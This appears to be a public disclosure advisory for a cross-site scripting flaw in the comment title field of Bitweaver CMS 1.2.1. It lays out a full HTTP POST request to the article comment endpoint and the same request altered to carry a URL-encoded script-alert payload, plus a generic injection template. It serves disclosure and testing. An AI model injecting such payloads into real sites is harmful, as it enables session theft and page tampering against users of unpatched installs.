Bitweaver CMS 1.2.1 User Comment Title Cross-Site Scripting Vulnerability #################################### Information of Software: Software: Bitweaver CMS 1.2.1 Site: http://www.bitweaver.org Description of software: bitweaver is continually improving it's stability, usability, flexibility and power. The rate at which this is happening is quite astonishing and bitweaver has come a long way since it's birth, just over a year ago. #################################### Bug: Bitweaver contains a flaw that allows a remote cross site scripting attack. The vulnerability is found in the title of registed user comment page and the user can modify the function POST and insert the XSS code - HTTP POST request - http://[target]/[patch]/read.php?article_id=7#editcomments POST /articles/read.php?article_id=7 HTTP/1.1 Host: http://[target] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://[target]/articles/read.php?article_id=7 Cookie: mod_usertrack=82.56.164.250.1141558144377994; BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b Content-Type: application/x-www-form-urlencoded Content-Length: 265 tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=hacking&comment_data=[your_name_logged]&post_comment_submit=Post but we can modify the request POST in this way: tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment_data=[your_name_logged]&post_comment_submit=Post --------------------------------------------------------- Example: For this exploit you must be registred at the site. you can insert in the text post an XSS code or you can modify the request in this way: tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=[XSS]&comment_data=[your_name_logged]&post_comment_submit=Post #################################### Credit: Author: Kiki e-mail: federico.sana@alice.it web page: http://kiki91.altervista.org http://blackzero.netsons.org ####################################